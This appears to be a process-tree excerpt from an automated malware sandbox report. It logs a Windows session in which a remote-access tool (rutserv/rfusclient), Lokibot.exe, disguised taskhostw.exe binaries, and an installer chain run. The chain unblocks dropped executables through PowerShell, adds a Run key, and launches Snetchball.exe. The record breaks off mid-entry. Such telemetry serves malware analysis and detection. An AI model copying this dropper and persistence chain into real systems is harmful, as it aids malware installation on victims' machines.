  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1940,1079265899310737970,3819052658595715922,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=61 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7540 /prefetch:1
  2⤵
  PID:5632
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1940,1079265899310737970,3819052658595715922,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=62 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3704 /prefetch:1
  2⤵
  PID:772
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1940,1079265899310737970,3819052658595715922,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=63 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4064 /prefetch:1
  2⤵
  PID:1032
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1940,1079265899310737970,3819052658595715922,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=64 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7808 /prefetch:1
  2⤵
  PID:1448
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1940,1079265899310737970,3819052658595715922,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=66 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6372 /prefetch:1
  2⤵
  PID:1536
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1940,1079265899310737970,3819052658595715922,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=8100 /prefetch:8
  2⤵
  - NTFS ADS
  PID:3184
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1940,1079265899310737970,3819052658595715922,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=8040 /prefetch:8
  2⤵
  - NTFS ADS
  PID:2984
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1940,1079265899310737970,3819052658595715922,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=69 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7688 /prefetch:1
  2⤵
  PID:5196
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1940,1079265899310737970,3819052658595715922,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=70 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6320 /prefetch:1
  2⤵
  PID:6056
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1940,1079265899310737970,3819052658595715922,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=71 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7392 /prefetch:1
  2⤵
  PID:1852
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1940,1079265899310737970,3819052658595715922,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=72 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7904 /prefetch:1
  2⤵
  PID:4028
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1940,1079265899310737970,3819052658595715922,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=73 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3736 /prefetch:1
  2⤵
  PID:5720
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1940,1079265899310737970,3819052658595715922,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=74 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8128 /prefetch:1
  2⤵
  PID:3112
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1940,1079265899310737970,3819052658595715922,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=75 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8124 /prefetch:1
  2⤵
  PID:6100
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1940,1079265899310737970,3819052658595715922,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=76 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7132 /prefetch:1
  2⤵
  PID:3872
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1940,1079265899310737970,3819052658595715922,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=77 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6548 /prefetch:1
  2⤵
  PID:5240
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1940,1079265899310737970,3819052658595715922,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=78 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7244 /prefetch:1
  2⤵
  PID:1404
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1940,1079265899310737970,3819052658595715922,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=79 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7212 /prefetch:1
  2⤵
  PID:6048
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1940,1079265899310737970,3819052658595715922,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4012 /prefetch:8
  2⤵
  PID:5348
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1940,1079265899310737970,3819052658595715922,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=81 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6320 /prefetch:1
  2⤵
  PID:6136
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1940,1079265899310737970,3819052658595715922,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=82 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2916 /prefetch:1
  2⤵
  PID:2124
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1940,1079265899310737970,3819052658595715922,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=83 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6068 /prefetch:1
  2⤵
  PID:5216
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1940,1079265899310737970,3819052658595715922,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=84 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7692 /prefetch:1
  2⤵
  PID:4964
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1940,1079265899310737970,3819052658595715922,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=85 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4060 /prefetch:1
  2⤵
  PID:4936
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1940,1079265899310737970,3819052658595715922,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=86 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1232 /prefetch:1
  2⤵
  PID:3388
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1940,1079265899310737970,3819052658595715922,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=87 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8256 /prefetch:1
  2⤵
  PID:4336
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1940,1079265899310737970,3819052658595715922,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=88 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8396 /prefetch:1
  2⤵
  PID:5180
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1940,1079265899310737970,3819052658595715922,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=89 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8748 /prefetch:1
  2⤵
  PID:2188
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1940,1079265899310737970,3819052658595715922,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=90 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5916 /prefetch:1
  2⤵
  PID:676
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1940,1079265899310737970,3819052658595715922,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=91 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9204 /prefetch:1
  2⤵
  PID:3204
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1940,1079265899310737970,3819052658595715922,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=92 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9456 /prefetch:1
  2⤵
  PID:5340
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1940,1079265899310737970,3819052658595715922,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=93 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9596 /prefetch:1
  2⤵
  PID:3564
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1940,1079265899310737970,3819052658595715922,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=94 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9796 /prefetch:1
  2⤵
  PID:1336
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1940,1079265899310737970,3819052658595715922,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=95 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7208 /prefetch:1
  2⤵
  PID:4760
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1940,1079265899310737970,3819052658595715922,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=96 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10104 /prefetch:1
  2⤵
  PID:5244
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1940,1079265899310737970,3819052658595715922,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=97 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10296 /prefetch:1
  2⤵
  PID:488
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1940,1079265899310737970,3819052658595715922,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=98 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7560 /prefetch:1
  2⤵
  PID:3700
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1940,1079265899310737970,3819052658595715922,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=99 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10512 /prefetch:1
  2⤵
  PID:652
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1940,1079265899310737970,3819052658595715922,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=100 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5432 /prefetch:1
  2⤵
  PID:3064
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1940,1079265899310737970,3819052658595715922,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=101 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9148 /prefetch:1
  2⤵
  PID:3056
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1940,1079265899310737970,3819052658595715922,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=102 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9796 /prefetch:1
  2⤵
  PID:460
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1940,1079265899310737970,3819052658595715922,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=103 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9792 /prefetch:1
  2⤵
  PID:2144
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1940,1079265899310737970,3819052658595715922,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=104 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10364 /prefetch:1
  2⤵
  PID:2808
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1940,1079265899310737970,3819052658595715922,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=105 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10436 /prefetch:1
  2⤵
  PID:1428
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1940,1079265899310737970,3819052658595715922,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=106 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5460 /prefetch:1
  2⤵
  PID:2552
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1940,1079265899310737970,3819052658595715922,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=108 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7544 /prefetch:1
  2⤵
  PID:3380
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1940,1079265899310737970,3819052658595715922,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4396 /prefetch:8
  2⤵
  - NTFS ADS
  PID:4404

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:5452

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:5552

C:\ProgramData\Windows\rutserv.exe
C:\ProgramData\Windows\rutserv.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:1500
- C:\ProgramData\Windows\rfusclient.exe
  C:\ProgramData\Windows\rfusclient.exe
  2⤵
  - Executes dropped EXE
  PID:5548
- - C:\ProgramData\Windows\rfusclient.exe
    C:\ProgramData\Windows\rfusclient.exe /tray
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: SetClipboardViewer
    PID:2000
- C:\ProgramData\Windows\rfusclient.exe
  C:\ProgramData\Windows\rfusclient.exe /tray
  2⤵
  - Executes dropped EXE
  PID:1272

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
1⤵
PID:2000

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
1⤵
PID:4832

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -s TermService
1⤵
PID:5904

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -s TermService
1⤵
- Loads dropped DLL
PID:1460

C:\Programdata\RealtekHD\taskhostw.exe
C:\Programdata\RealtekHD\taskhostw.exe
1⤵
- Executes dropped EXE
PID:6140

C:\Users\Admin\Downloads\Lokibot.exe
"C:\Users\Admin\Downloads\Lokibot.exe"
1⤵
- Executes dropped EXE
PID:6140

C:\Users\Admin\Downloads\Lokibot.exe
"C:\Users\Admin\Downloads\Lokibot.exe"
1⤵
- Executes dropped EXE
PID:5812

C:\Programdata\RealtekHD\taskhostw.exe
C:\Programdata\RealtekHD\taskhostw.exe
1⤵
- Executes dropped EXE
PID:4732

C:\Programdata\RealtekHD\taskhostw.exe
C:\Programdata\RealtekHD\taskhostw.exe
1⤵
- Executes dropped EXE
PID:4488

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:4244

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s AppMgmt
1⤵
PID:3952

C:\Programdata\RealtekHD\taskhostw.exe
C:\Programdata\RealtekHD\taskhostw.exe
1⤵
- Executes dropped EXE
PID:5484

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x00000000000004C4 0x00000000000004CC
1⤵
PID:5820

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:3480

C:\Programdata\RealtekHD\taskhostw.exe
C:\Programdata\RealtekHD\taskhostw.exe
1⤵
- Executes dropped EXE
PID:3160

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s NPSMSvc
1⤵
PID:2332

C:\Programdata\RealtekHD\taskhostw.exe
C:\Programdata\RealtekHD\taskhostw.exe
1⤵
- Executes dropped EXE
PID:3140

C:\Programdata\RealtekHD\taskhostw.exe
C:\Programdata\RealtekHD\taskhostw.exe
1⤵
- Executes dropped EXE
PID:1552

C:\Users\Admin\AppData\Local\Temp\Temp1_setup_64JzqalmqE.zip\setup_64JzqalmqE.exe
"C:\Users\Admin\AppData\Local\Temp\Temp1_setup_64JzqalmqE.zip\setup_64JzqalmqE.exe"
1⤵
PID:2832
- C:\Users\Admin\AppData\Local\Temp\is-ML1EK.tmp\is-66TNR.tmp
  "C:\Users\Admin\AppData\Local\Temp\is-ML1EK.tmp\is-66TNR.tmp" /SL4 $60304 "C:\Users\Admin\AppData\Local\Temp\Temp1_setup_64JzqalmqE.zip\setup_64JzqalmqE.exe" 6853501 52224
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  PID:3308
- - C:\Windows\SysWOW64\schtasks.exe
    "C:\Windows\system32\schtasks.exe" /Query
    3⤵
    PID:5244
- - C:\Users\Admin\AppData\Local\Audio Player JS Plugin\audioplayerjsplugin.exe
    "C:\Users\Admin\AppData\Local\Audio Player JS Plugin\audioplayerjsplugin.exe" 1b91a42d492f93723569f9bfd4954f5f
    3⤵
    - Executes dropped EXE
    - Modifies registry class
    PID:3748
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c powershell -Command "Unblock-File -Path C:\Users\Admin\AppData\Local\Temp\3VGqwXkp\2pS5wMzsgp7KIXlJSq.exe"
      4⤵
      PID:4728
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Unblock-File -Path C:\Users\Admin\AppData\Local\Temp\3VGqwXkp\2pS5wMzsgp7KIXlJSq.exe"
        5⤵
        
        PID:4368
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c powershell -Command "Unblock-File -Path C:\Users\Admin\AppData\Local\Temp\viqyHqQ1\a3jiZHv4RuYAP2o6kdPT.exe"
      4⤵
      PID:5116
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Unblock-File -Path C:\Users\Admin\AppData\Local\Temp\viqyHqQ1\a3jiZHv4RuYAP2o6kdPT.exe"
        5⤵
        
        PID:3332
  - - C:\Users\Admin\AppData\Local\Temp\3VGqwXkp\2pS5wMzsgp7KIXlJSq.exe
      C:\Users\Admin\AppData\Local\Temp\3VGqwXkp\2pS5wMzsgp7KIXlJSq.exe /sid=3 /pid=449
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:6068
    - - C:\Users\Admin\AppData\Local\Temp\setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup.exe"
        5⤵
        Loads dropped DLL
        Adds Run key to start application
        
        PID:1016
      - C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        6⤵
        Loads dropped DLL
        Drops file in Windows directory
        Modifies Control Panel
        
        PID:6028
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=gpu-process --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.22 (KHTML, like Gecko) Chrome/123.0.6312.86 Safari/537.22 anonymized by Abelssoft 1345691138" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=2820 --field-trial-handle=2824,i,16189599843968753531,18440944468441774444,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:2
        7⤵
        Loads dropped DLL
        
        PID:4952
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.22 (KHTML, like Gecko) Chrome/123.0.6312.86 Safari/537.22 anonymized by Abelssoft 1345691138" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=2956 --field-trial-handle=2824,i,16189599843968753531,18440944468441774444,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:8
        7⤵
        Loads dropped DLL
        
        PID:4668
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.22 (KHTML, like Gecko) Chrome/123.0.6312.86 Safari/537.22 anonymized by Abelssoft 1345691138" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=2964 --field-trial-handle=2824,i,16189599843968753531,18440944468441774444,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:8
        7⤵
        
        PID:1844
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
